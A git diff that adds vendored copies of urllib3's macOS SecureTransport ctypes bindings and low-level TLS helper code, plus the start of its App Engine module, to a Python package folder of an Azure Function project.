b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc new file mode 100644 index 0000000..d93782b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py new file mode 100644 index 0000000..56e799a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py @@ -0,0 +1,519 @@ +""" +This module uses ctypes to bind a whole bunch of functions and constants from +SecureTransport. The goal here is to provide the low-level API to +SecureTransport. These are essentially the C-level functions and constants, and +they're pretty gross to work with. + +This code is a bastardised version of the code found in Will Bond's oscrypto +library. An enormous debt is owed to him for blazing this trail for us. For +that reason, this code should be considered to be covered both by urllib3's +license and by oscrypto's: + + Copyright (c) 2015-2016 Will Bond + + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. +""" +from __future__ import absolute_import + +import platform +from ctypes import ( + CDLL, + CFUNCTYPE, + POINTER, + c_bool, + c_byte, + c_char_p, + c_int32, + c_long, + c_size_t, + c_uint32, + c_ulong, + c_void_p, +) +from ctypes.util import find_library + +from ...packages.six import raise_from + +if platform.system() != "Darwin": + raise ImportError("Only macOS is supported") + +version = platform.mac_ver()[0] +version_info = tuple(map(int, version.split("."))) +if version_info < (10, 8): + raise OSError( + "Only OS X 10.8 and newer are supported, not %s.%s" + % (version_info[0], version_info[1]) + ) + + +def load_cdll(name, macos10_16_path): + """Loads a CDLL by name, falling back to known path on 10.16+""" + try: + # Big Sur is technically 11 but we use 10.16 due to the Big Sur + # beta being labeled as 10.16. + if version_info >= (10, 16): + path = macos10_16_path + else: + path = find_library(name) + if not path: + raise OSError # Caught and reraised as 'ImportError' + return CDLL(path, use_errno=True) + except OSError: + raise_from(ImportError("The library %s failed to load" % name), None) + + +Security = load_cdll( + "Security", "/System/Library/Frameworks/Security.framework/Security" +) +CoreFoundation = load_cdll( + "CoreFoundation", + "/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", +) + + +Boolean = c_bool +CFIndex = c_long +CFStringEncoding = c_uint32 +CFData = c_void_p +CFString = c_void_p +CFArray = c_void_p +CFMutableArray = c_void_p +CFDictionary = c_void_p +CFError = c_void_p +CFType = c_void_p +CFTypeID = c_ulong + +CFTypeRef = POINTER(CFType) +CFAllocatorRef = c_void_p + +OSStatus = c_int32 + +CFDataRef = POINTER(CFData) +CFStringRef = POINTER(CFString) +CFArrayRef = POINTER(CFArray) +CFMutableArrayRef = POINTER(CFMutableArray) +CFDictionaryRef = POINTER(CFDictionary) +CFArrayCallBacks = c_void_p +CFDictionaryKeyCallBacks = c_void_p +CFDictionaryValueCallBacks = c_void_p + +SecCertificateRef = POINTER(c_void_p) +SecExternalFormat = c_uint32 +SecExternalItemType = c_uint32 +SecIdentityRef = POINTER(c_void_p) +SecItemImportExportFlags = c_uint32 +SecItemImportExportKeyParameters = c_void_p +SecKeychainRef = POINTER(c_void_p) +SSLProtocol = c_uint32 +SSLCipherSuite = c_uint32 +SSLContextRef = POINTER(c_void_p) +SecTrustRef = POINTER(c_void_p) +SSLConnectionRef = c_uint32 +SecTrustResultType = c_uint32 +SecTrustOptionFlags = c_uint32 +SSLProtocolSide = c_uint32 +SSLConnectionType = c_uint32 +SSLSessionOption = c_uint32 + + +try: + Security.SecItemImport.argtypes = [ + CFDataRef, + CFStringRef, + POINTER(SecExternalFormat), + POINTER(SecExternalItemType), + SecItemImportExportFlags, + POINTER(SecItemImportExportKeyParameters), + SecKeychainRef, + POINTER(CFArrayRef), + ] + Security.SecItemImport.restype = OSStatus + + Security.SecCertificateGetTypeID.argtypes = [] + Security.SecCertificateGetTypeID.restype = CFTypeID + + Security.SecIdentityGetTypeID.argtypes = [] + Security.SecIdentityGetTypeID.restype = CFTypeID + + Security.SecKeyGetTypeID.argtypes = [] + Security.SecKeyGetTypeID.restype = CFTypeID + + Security.SecCertificateCreateWithData.argtypes = [CFAllocatorRef, CFDataRef] + Security.SecCertificateCreateWithData.restype = SecCertificateRef + + Security.SecCertificateCopyData.argtypes = [SecCertificateRef] + Security.SecCertificateCopyData.restype = CFDataRef + + Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p] + Security.SecCopyErrorMessageString.restype = CFStringRef + + Security.SecIdentityCreateWithCertificate.argtypes = [ + CFTypeRef, + SecCertificateRef, + POINTER(SecIdentityRef), + ] + Security.SecIdentityCreateWithCertificate.restype = OSStatus + + Security.SecKeychainCreate.argtypes = [ + c_char_p, + c_uint32, + c_void_p, + Boolean, + c_void_p, + POINTER(SecKeychainRef), + ] + Security.SecKeychainCreate.restype = OSStatus + + Security.SecKeychainDelete.argtypes = [SecKeychainRef] + Security.SecKeychainDelete.restype = OSStatus + + Security.SecPKCS12Import.argtypes = [ + CFDataRef, + CFDictionaryRef, + POINTER(CFArrayRef), + ] + Security.SecPKCS12Import.restype = OSStatus + + SSLReadFunc = CFUNCTYPE(OSStatus, SSLConnectionRef, c_void_p, POINTER(c_size_t)) + SSLWriteFunc = CFUNCTYPE( + OSStatus, SSLConnectionRef, POINTER(c_byte), POINTER(c_size_t) + ) + + Security.SSLSetIOFuncs.argtypes = [SSLContextRef, SSLReadFunc, SSLWriteFunc] + Security.SSLSetIOFuncs.restype = OSStatus + + Security.SSLSetPeerID.argtypes = [SSLContextRef, c_char_p, c_size_t] + Security.SSLSetPeerID.restype = OSStatus + + Security.SSLSetCertificate.argtypes = [SSLContextRef, CFArrayRef] + Security.SSLSetCertificate.restype = OSStatus + + Security.SSLSetCertificateAuthorities.argtypes = [SSLContextRef, CFTypeRef, Boolean] + Security.SSLSetCertificateAuthorities.restype = OSStatus + + Security.SSLSetConnection.argtypes = [SSLContextRef, SSLConnectionRef] + Security.SSLSetConnection.restype = OSStatus + + Security.SSLSetPeerDomainName.argtypes = [SSLContextRef, c_char_p, c_size_t] + Security.SSLSetPeerDomainName.restype = OSStatus + + Security.SSLHandshake.argtypes = [SSLContextRef] + Security.SSLHandshake.restype = OSStatus + + Security.SSLRead.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)] + Security.SSLRead.restype = OSStatus + + Security.SSLWrite.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)] + Security.SSLWrite.restype = OSStatus + + Security.SSLClose.argtypes = [SSLContextRef] + Security.SSLClose.restype = OSStatus + + Security.SSLGetNumberSupportedCiphers.argtypes = [SSLContextRef, POINTER(c_size_t)] + Security.SSLGetNumberSupportedCiphers.restype = OSStatus + + Security.SSLGetSupportedCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + POINTER(c_size_t), + ] + Security.SSLGetSupportedCiphers.restype = OSStatus + + Security.SSLSetEnabledCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + c_size_t, + ] + Security.SSLSetEnabledCiphers.restype = OSStatus + + Security.SSLGetNumberEnabledCiphers.argtype = [SSLContextRef, POINTER(c_size_t)] + Security.SSLGetNumberEnabledCiphers.restype = OSStatus + + Security.SSLGetEnabledCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + POINTER(c_size_t), + ] + Security.SSLGetEnabledCiphers.restype = OSStatus + + Security.SSLGetNegotiatedCipher.argtypes = [SSLContextRef, POINTER(SSLCipherSuite)] + Security.SSLGetNegotiatedCipher.restype = OSStatus + + Security.SSLGetNegotiatedProtocolVersion.argtypes = [ + SSLContextRef, + POINTER(SSLProtocol), + ] + Security.SSLGetNegotiatedProtocolVersion.restype = OSStatus + + Security.SSLCopyPeerTrust.argtypes = [SSLContextRef, POINTER(SecTrustRef)] + Security.SSLCopyPeerTrust.restype = OSStatus + + Security.SecTrustSetAnchorCertificates.argtypes = [SecTrustRef, CFArrayRef] + Security.SecTrustSetAnchorCertificates.restype = OSStatus + + Security.SecTrustSetAnchorCertificatesOnly.argstypes = [SecTrustRef, Boolean] + Security.SecTrustSetAnchorCertificatesOnly.restype = OSStatus + + Security.SecTrustEvaluate.argtypes = [SecTrustRef, POINTER(SecTrustResultType)] + Security.SecTrustEvaluate.restype = OSStatus + + Security.SecTrustGetCertificateCount.argtypes = [SecTrustRef] + Security.SecTrustGetCertificateCount.restype = CFIndex + + Security.SecTrustGetCertificateAtIndex.argtypes = [SecTrustRef, CFIndex] + Security.SecTrustGetCertificateAtIndex.restype = SecCertificateRef + + Security.SSLCreateContext.argtypes = [ + CFAllocatorRef, + SSLProtocolSide, + SSLConnectionType, + ] + Security.SSLCreateContext.restype = SSLContextRef + + Security.SSLSetSessionOption.argtypes = [SSLContextRef, SSLSessionOption, Boolean] + Security.SSLSetSessionOption.restype = OSStatus + + Security.SSLSetProtocolVersionMin.argtypes = [SSLContextRef, SSLProtocol] + Security.SSLSetProtocolVersionMin.restype = OSStatus + + Security.SSLSetProtocolVersionMax.argtypes = [SSLContextRef, SSLProtocol] + Security.SSLSetProtocolVersionMax.restype = OSStatus + + try: + Security.SSLSetALPNProtocols.argtypes = [SSLContextRef, CFArrayRef] + Security.SSLSetALPNProtocols.restype = OSStatus + except AttributeError: + # Supported only in 10.12+ + pass + + Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p] + Security.SecCopyErrorMessageString.restype = CFStringRef + + Security.SSLReadFunc = SSLReadFunc + Security.SSLWriteFunc = SSLWriteFunc + Security.SSLContextRef = SSLContextRef + Security.SSLProtocol = SSLProtocol + Security.SSLCipherSuite = SSLCipherSuite + Security.SecIdentityRef = SecIdentityRef + Security.SecKeychainRef = SecKeychainRef + Security.SecTrustRef = SecTrustRef + Security.SecTrustResultType = SecTrustResultType + Security.SecExternalFormat = SecExternalFormat + Security.OSStatus = OSStatus + + Security.kSecImportExportPassphrase = CFStringRef.in_dll( + Security, "kSecImportExportPassphrase" + ) + Security.kSecImportItemIdentity = CFStringRef.in_dll( + Security, "kSecImportItemIdentity" + ) + + # CoreFoundation time! + CoreFoundation.CFRetain.argtypes = [CFTypeRef] + CoreFoundation.CFRetain.restype = CFTypeRef + + CoreFoundation.CFRelease.argtypes = [CFTypeRef] + CoreFoundation.CFRelease.restype = None + + CoreFoundation.CFGetTypeID.argtypes = [CFTypeRef] + CoreFoundation.CFGetTypeID.restype = CFTypeID + + CoreFoundation.CFStringCreateWithCString.argtypes = [ + CFAllocatorRef, + c_char_p, + CFStringEncoding, + ] + CoreFoundation.CFStringCreateWithCString.restype = CFStringRef + + CoreFoundation.CFStringGetCStringPtr.argtypes = [CFStringRef, CFStringEncoding] + CoreFoundation.CFStringGetCStringPtr.restype = c_char_p + + CoreFoundation.CFStringGetCString.argtypes = [ + CFStringRef, + c_char_p, + CFIndex, + CFStringEncoding, + ] + CoreFoundation.CFStringGetCString.restype = c_bool + + CoreFoundation.CFDataCreate.argtypes = [CFAllocatorRef, c_char_p, CFIndex] + CoreFoundation.CFDataCreate.restype = CFDataRef + + CoreFoundation.CFDataGetLength.argtypes = [CFDataRef] + CoreFoundation.CFDataGetLength.restype = CFIndex + + CoreFoundation.CFDataGetBytePtr.argtypes = [CFDataRef] + CoreFoundation.CFDataGetBytePtr.restype = c_void_p + + CoreFoundation.CFDictionaryCreate.argtypes = [ + CFAllocatorRef, + POINTER(CFTypeRef), + POINTER(CFTypeRef), + CFIndex, + CFDictionaryKeyCallBacks, + CFDictionaryValueCallBacks, + ] + CoreFoundation.CFDictionaryCreate.restype = CFDictionaryRef + + CoreFoundation.CFDictionaryGetValue.argtypes = [CFDictionaryRef, CFTypeRef] + CoreFoundation.CFDictionaryGetValue.restype = CFTypeRef + + CoreFoundation.CFArrayCreate.argtypes = [ + CFAllocatorRef, + POINTER(CFTypeRef), + CFIndex, + CFArrayCallBacks, + ] + CoreFoundation.CFArrayCreate.restype = CFArrayRef + + CoreFoundation.CFArrayCreateMutable.argtypes = [ + CFAllocatorRef, + CFIndex, + CFArrayCallBacks, + ] + CoreFoundation.CFArrayCreateMutable.restype = CFMutableArrayRef + + CoreFoundation.CFArrayAppendValue.argtypes = [CFMutableArrayRef, c_void_p] + CoreFoundation.CFArrayAppendValue.restype = None + + CoreFoundation.CFArrayGetCount.argtypes = [CFArrayRef] + CoreFoundation.CFArrayGetCount.restype = CFIndex + + CoreFoundation.CFArrayGetValueAtIndex.argtypes = [CFArrayRef, CFIndex] + CoreFoundation.CFArrayGetValueAtIndex.restype = c_void_p + + CoreFoundation.kCFAllocatorDefault = CFAllocatorRef.in_dll( + CoreFoundation, "kCFAllocatorDefault" + ) + CoreFoundation.kCFTypeArrayCallBacks = c_void_p.in_dll( + CoreFoundation, "kCFTypeArrayCallBacks" + ) + CoreFoundation.kCFTypeDictionaryKeyCallBacks = c_void_p.in_dll( + CoreFoundation, "kCFTypeDictionaryKeyCallBacks" + ) + CoreFoundation.kCFTypeDictionaryValueCallBacks = c_void_p.in_dll( + CoreFoundation, "kCFTypeDictionaryValueCallBacks" + ) + + CoreFoundation.CFTypeRef = CFTypeRef + CoreFoundation.CFArrayRef = CFArrayRef + CoreFoundation.CFStringRef = CFStringRef + CoreFoundation.CFDictionaryRef = CFDictionaryRef + +except (AttributeError): + raise ImportError("Error initializing ctypes") + + +class CFConst(object): + """ + A class object that acts as essentially a namespace for CoreFoundation + constants. + """ + + kCFStringEncodingUTF8 = CFStringEncoding(0x08000100) + + +class SecurityConst(object): + """ + A class object that acts as essentially a namespace for Security constants. + """ + + kSSLSessionOptionBreakOnServerAuth = 0 + + kSSLProtocol2 = 1 + kSSLProtocol3 = 2 + kTLSProtocol1 = 4 + kTLSProtocol11 = 7 + kTLSProtocol12 = 8 + # SecureTransport does not support TLS 1.3 even if there's a constant for it + kTLSProtocol13 = 10 + kTLSProtocolMaxSupported = 999 + + kSSLClientSide = 1 + kSSLStreamType = 0 + + kSecFormatPEMSequence = 10 + + kSecTrustResultInvalid = 0 + kSecTrustResultProceed = 1 + # This gap is present on purpose: this was kSecTrustResultConfirm, which + # is deprecated. + kSecTrustResultDeny = 3 + kSecTrustResultUnspecified = 4 + kSecTrustResultRecoverableTrustFailure = 5 + kSecTrustResultFatalTrustFailure = 6 + kSecTrustResultOtherError = 7 + + errSSLProtocol = -9800 + errSSLWouldBlock = -9803 + errSSLClosedGraceful = -9805 + errSSLClosedNoNotify = -9816 + errSSLClosedAbort = -9806 + + errSSLXCertChainInvalid = -9807 + errSSLCrypto = -9809 + errSSLInternal = -9810 + errSSLCertExpired = -9814 + errSSLCertNotYetValid = -9815 + errSSLUnknownRootCert = -9812 + errSSLNoRootCert = -9813 + errSSLHostNameMismatch = -9843 + errSSLPeerHandshakeFail = -9824 + errSSLPeerUserCancelled = -9839 + errSSLWeakPeerEphemeralDHKey = -9850 + errSSLServerAuthCompleted = -9841 + errSSLRecordOverflow = -9847 + + errSecVerifyFailed = -67808 + errSecNoTrustSettings = -25263 + errSecItemNotFound = -25300 + errSecInvalidTrustSettings = -25262 + + # Cipher suites. We only pick the ones our default cipher string allows. + # Source: https://developer.apple.com/documentation/security/1550981-ssl_cipher_suite_values + TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C + TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030 + TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B + TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F + TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9 + TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8 + TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009F + TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009E + TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xC024 + TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xC028 + TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xC00A + TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xC014 + TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006B + TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039 + TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xC023 + TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xC027 + TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xC009 + TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xC013 + TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067 + TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033 + TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009D + TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009C + TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003D + TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003C + TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035 + TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F + TLS_AES_128_GCM_SHA256 = 0x1301 + TLS_AES_256_GCM_SHA384 = 0x1302 + TLS_AES_128_CCM_8_SHA256 = 0x1305 + TLS_AES_128_CCM_SHA256 = 0x1304 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py new file mode 100644 index 0000000..a725c5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py @@ -0,0 +1,397 @@ +""" +Low-level helpers for the SecureTransport bindings. + +These are Python functions that are not directly related to the high-level APIs +but are necessary to get them to work. They include a whole bunch of low-level +CoreFoundation messing about and memory management. The concerns in this module +are almost entirely about trying to avoid memory leaks and providing +appropriate and useful assistance to the higher-level code. +""" +import base64 +import ctypes +import itertools +import os +import re +import ssl +import struct +import tempfile + +from .bindings import CFConst, CoreFoundation, Security + +# This regular expression is used to grab PEM data out of a PEM bundle. +_PEM_CERTS_RE = re.compile( + b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL +) + + +def _cf_data_from_bytes(bytestring): + """ + Given a bytestring, create a CFData object from it. This CFData object must + be CFReleased by the caller. + """ + return CoreFoundation.CFDataCreate( + CoreFoundation.kCFAllocatorDefault, bytestring, len(bytestring) + ) + + +def _cf_dictionary_from_tuples(tuples): + """ + Given a list of Python tuples, create an associated CFDictionary. + """ + dictionary_size = len(tuples) + + # We need to get the dictionary keys and values out in the same order. + keys = (t[0] for t in tuples) + values = (t[1] for t in tuples) + cf_keys = (CoreFoundation.CFTypeRef * dictionary_size)(*keys) + cf_values = (CoreFoundation.CFTypeRef * dictionary_size)(*values) + + return CoreFoundation.CFDictionaryCreate( + CoreFoundation.kCFAllocatorDefault, + cf_keys, + cf_values, + dictionary_size, + CoreFoundation.kCFTypeDictionaryKeyCallBacks, + CoreFoundation.kCFTypeDictionaryValueCallBacks, + ) + + +def _cfstr(py_bstr): + """ + Given a Python binary data, create a CFString. + The string must be CFReleased by the caller. + """ + c_str = ctypes.c_char_p(py_bstr) + cf_str = CoreFoundation.CFStringCreateWithCString( + CoreFoundation.kCFAllocatorDefault, + c_str, + CFConst.kCFStringEncodingUTF8, + ) + return cf_str + + +def _create_cfstring_array(lst): + """ + Given a list of Python binary data, create an associated CFMutableArray. + The array must be CFReleased by the caller. + + Raises an ssl.SSLError on failure. + """ + cf_arr = None + try: + cf_arr = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + if not cf_arr: + raise MemoryError("Unable to allocate memory!") + for item in lst: + cf_str = _cfstr(item) + if not cf_str: + raise MemoryError("Unable to allocate memory!") + try: + CoreFoundation.CFArrayAppendValue(cf_arr, cf_str) + finally: + CoreFoundation.CFRelease(cf_str) + except BaseException as e: + if cf_arr: + CoreFoundation.CFRelease(cf_arr) + raise ssl.SSLError("Unable to allocate array: %s" % (e,)) + return cf_arr + + +def _cf_string_to_unicode(value): + """ + Creates a Unicode string from a CFString object. Used entirely for error + reporting. + + Yes, it annoys me quite a lot that this function is this complex. + """ + value_as_void_p = ctypes.cast(value, ctypes.POINTER(ctypes.c_void_p)) + + string = CoreFoundation.CFStringGetCStringPtr( + value_as_void_p, CFConst.kCFStringEncodingUTF8 + ) + if string is None: + buffer = ctypes.create_string_buffer(1024) + result = CoreFoundation.CFStringGetCString( + value_as_void_p, buffer, 1024, CFConst.kCFStringEncodingUTF8 + ) + if not result: + raise OSError("Error copying C string from CFStringRef") + string = buffer.value + if string is not None: + string = string.decode("utf-8") + return string + + +def _assert_no_error(error, exception_class=None): + """ + Checks the return code and throws an exception if there is an error to + report + """ + if error == 0: + return + + cf_error_string = Security.SecCopyErrorMessageString(error, None) + output = _cf_string_to_unicode(cf_error_string) + CoreFoundation.CFRelease(cf_error_string) + + if output is None or output == u"": + output = u"OSStatus %s" % error + + if exception_class is None: + exception_class = ssl.SSLError + + raise exception_class(output) + + +def _cert_array_from_pem(pem_bundle): + """ + Given a bundle of certs in PEM format, turns them into a CFArray of certs + that can be used to validate a cert chain. + """ + # Normalize the PEM bundle's line endings. + pem_bundle = pem_bundle.replace(b"\r\n", b"\n") + + der_certs = [ + base64.b64decode(match.group(1)) for match in _PEM_CERTS_RE.finditer(pem_bundle) + ] + if not der_certs: + raise ssl.SSLError("No root certificates specified") + + cert_array = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + if not cert_array: + raise ssl.SSLError("Unable to allocate memory!") + + try: + for der_bytes in der_certs: + certdata = _cf_data_from_bytes(der_bytes) + if not certdata: + raise ssl.SSLError("Unable to allocate memory!") + cert = Security.SecCertificateCreateWithData( + CoreFoundation.kCFAllocatorDefault, certdata + ) + CoreFoundation.CFRelease(certdata) + if not cert: + raise ssl.SSLError("Unable to build cert object!") + + CoreFoundation.CFArrayAppendValue(cert_array, cert) + CoreFoundation.CFRelease(cert) + except Exception: + # We need to free the array before the exception bubbles further. + # We only want to do that if an error occurs: otherwise, the caller + # should free. + CoreFoundation.CFRelease(cert_array) + raise + + return cert_array + + +def _is_cert(item): + """ + Returns True if a given CFTypeRef is a certificate. + """ + expected = Security.SecCertificateGetTypeID() + return CoreFoundation.CFGetTypeID(item) == expected + + +def _is_identity(item): + """ + Returns True if a given CFTypeRef is an identity. + """ + expected = Security.SecIdentityGetTypeID() + return CoreFoundation.CFGetTypeID(item) == expected + + +def _temporary_keychain(): + """ + This function creates a temporary Mac keychain that we can use to work with + credentials. This keychain uses a one-time password and a temporary file to + store the data. We expect to have one keychain per socket. The returned + SecKeychainRef must be freed by the caller, including calling + SecKeychainDelete. + + Returns a tuple of the SecKeychainRef and the path to the temporary + directory that contains it. + """ + # Unfortunately, SecKeychainCreate requires a path to a keychain. This + # means we cannot use mkstemp to use a generic temporary file. Instead, + # we're going to create a temporary directory and a filename to use there. + # This filename will be 8 random bytes expanded into base64. We also need + # some random bytes to password-protect the keychain we're creating, so we + # ask for 40 random bytes. + random_bytes = os.urandom(40) + filename = base64.b16encode(random_bytes[:8]).decode("utf-8") + password = base64.b16encode(random_bytes[8:]) # Must be valid UTF-8 + tempdirectory = tempfile.mkdtemp() + + keychain_path = os.path.join(tempdirectory, filename).encode("utf-8") + + # We now want to create the keychain itself. + keychain = Security.SecKeychainRef() + status = Security.SecKeychainCreate( + keychain_path, len(password), password, False, None, ctypes.byref(keychain) + ) + _assert_no_error(status) + + # Having created the keychain, we want to pass it off to the caller. + return keychain, tempdirectory + + +def _load_items_from_file(keychain, path): + """ + Given a single file, loads all the trust objects from it into arrays and + the keychain. + Returns a tuple of lists: the first list is a list of identities, the + second a list of certs. + """ + certificates = [] + identities = [] + result_array = None + + with open(path, "rb") as f: + raw_filedata = f.read() + + try: + filedata = CoreFoundation.CFDataCreate( + CoreFoundation.kCFAllocatorDefault, raw_filedata, len(raw_filedata) + ) + result_array = CoreFoundation.CFArrayRef() + result = Security.SecItemImport( + filedata, # cert data + None, # Filename, leaving it out for now + None, # What the type of the file is, we don't care + None, # what's in the file, we don't care + 0, # import flags + None, # key params, can include passphrase in the future + keychain, # The keychain to insert into + ctypes.byref(result_array), # Results + ) + _assert_no_error(result) + + # A CFArray is not very useful to us as an intermediary + # representation, so we are going to extract the objects we want + # and then free the array. We don't need to keep hold of keys: the + # keychain already has them! + result_count = CoreFoundation.CFArrayGetCount(result_array) + for index in range(result_count): + item = CoreFoundation.CFArrayGetValueAtIndex(result_array, index) + item = ctypes.cast(item, CoreFoundation.CFTypeRef) + + if _is_cert(item): + CoreFoundation.CFRetain(item) + certificates.append(item) + elif _is_identity(item): + CoreFoundation.CFRetain(item) + identities.append(item) + finally: + if result_array: + CoreFoundation.CFRelease(result_array) + + CoreFoundation.CFRelease(filedata) + + return (identities, certificates) + + +def _load_client_cert_chain(keychain, *paths): + """ + Load certificates and maybe keys from a number of files. Has the end goal + of returning a CFArray containing one SecIdentityRef, and then zero or more + SecCertificateRef objects, suitable for use as a client certificate trust + chain. + """ + # Ok, the strategy. + # + # This relies on knowing that macOS will not give you a SecIdentityRef + # unless you have imported a key into a keychain. This is a somewhat + # artificial limitation of macOS (for example, it doesn't necessarily + # affect iOS), but there is nothing inside Security.framework that lets you + # get a SecIdentityRef without having a key in a keychain. + # + # So the policy here is we take all the files and iterate them in order. + # Each one will use SecItemImport to have one or more objects loaded from + # it. We will also point at a keychain that macOS can use to work with the + # private key. + # + # Once we have all the objects, we'll check what we actually have. If we + # already have a SecIdentityRef in hand, fab: we'll use that. Otherwise, + # we'll take the first certificate (which we assume to be our leaf) and + # ask the keychain to give us a SecIdentityRef with that cert's associated + # key. + # + # We'll then return a CFArray containing the trust chain: one + # SecIdentityRef and then zero-or-more SecCertificateRef objects. The + # responsibility for freeing this CFArray will be with the caller. This + # CFArray must remain alive for the entire connection, so in practice it + # will be stored with a single SSLSocket, along with the reference to the + # keychain. + certificates = [] + identities = [] + + # Filter out bad paths. + paths = (path for path in paths if path) + + try: + for file_path in paths: + new_identities, new_certs = _load_items_from_file(keychain, file_path) + identities.extend(new_identities) + certificates.extend(new_certs) + + # Ok, we have everything. The question is: do we have an identity? If + # not, we want to grab one from the first cert we have. + if not identities: + new_identity = Security.SecIdentityRef() + status = Security.SecIdentityCreateWithCertificate( + keychain, certificates[0], ctypes.byref(new_identity) + ) + _assert_no_error(status) + identities.append(new_identity) + + # We now want to release the original certificate, as we no longer + # need it. + CoreFoundation.CFRelease(certificates.pop(0)) + + # We now need to build a new CFArray that holds the trust chain. + trust_chain = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + for item in itertools.chain(identities, certificates): + # ArrayAppendValue does a CFRetain on the item. That's fine, + # because the finally block will release our other refs to them. + CoreFoundation.CFArrayAppendValue(trust_chain, item) + + return trust_chain + finally: + for obj in itertools.chain(identities, certificates): + CoreFoundation.CFRelease(obj) + + +TLS_PROTOCOL_VERSIONS = { + "SSLv2": (0, 2), + "SSLv3": (3, 0), + "TLSv1": (3, 1), + "TLSv1.1": (3, 2), + "TLSv1.2": (3, 3), +} + + +def _build_tls_unknown_ca_alert(version): + """ + Builds a TLS alert record for an unknown CA. + """ + ver_maj, ver_min = TLS_PROTOCOL_VERSIONS[version] + severity_fatal = 0x02 + description_unknown_ca = 0x30 + msg = struct.pack(">BB", severity_fatal, description_unknown_ca) + msg_len = len(msg) + record_type_alert = 0x15 + record = struct.pack(">BBBH", record_type_alert, ver_maj, ver_min, msg_len) + msg + return record diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py new file mode 100644 index 0000000..4cfbf7c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py @@ -0,0 +1,314 @@ +""" +This module provides a pool manager that uses Google App Engine's +`URLFetch Service `_. + +Example usage:: + + from urllib3 import PoolManager + from urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox + + if is_appengine_sandbox(): + # AppEngineManager uses AppEngine's URLFetch API behind the scenes + http = AppEngineManager() + else: + # PoolManager uses a socket-level API behind the scenes + http = PoolManager() + + r = 